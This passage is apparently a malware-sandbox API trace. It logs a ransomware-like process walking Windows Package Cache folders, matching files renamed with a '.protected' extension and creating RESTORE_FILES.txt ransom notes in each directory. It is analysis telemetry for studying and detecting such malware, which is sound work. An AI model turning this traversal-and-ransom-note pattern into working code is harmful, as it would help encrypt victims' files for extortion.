out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 158 [0093.374] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.374] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 137 [0093.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.375] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.375] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.375] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.375] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.375] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.375] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.375] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.376] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.376] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.376] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.376] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.376] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 86 [0093.376] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0093.376] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned 88 [0093.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\.") returned 88 [0093.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.377] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\..") returned 89 [0093.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.377] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 95 [0093.377] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.377] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.377] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned 97 [0093.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\.") returned 97 [0093.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\..") returned 98 [0093.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.378] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.378] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 116 [0093.378] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned 118 [0093.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\.") returned 118 [0093.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.378] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\..") returned 119 [0093.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 135 [0093.379] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.379] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.379] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 152 [0093.379] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.379] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.379] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.379] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.379] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.379] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.380] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.380] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.380] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.381] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.381] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 75 [0093.381] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0093.381] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned 77 [0093.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\.") returned 77 [0093.381] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\..") returned 78 [0093.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 93 [0093.381] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.381] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected") returned 95 [0093.382] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected") returned 102 [0093.382] StrStrIW (lpFirst="vcredist_x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.382] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 93 [0093.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.382] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.382] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 86 [0093.382] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned 88 [0093.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\.") returned 88 [0093.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\..") returned 89 [0093.382] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 95 [0093.382] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned 97 [0093.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\.") returned 97 [0093.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\..") returned 98 [0093.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.383] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.383] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 118 [0093.383] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.383] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned 120 [0093.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\.") returned 120 [0093.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\..") returned 121 [0093.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 137 [0093.384] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.384] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.384] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 154 [0093.384] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 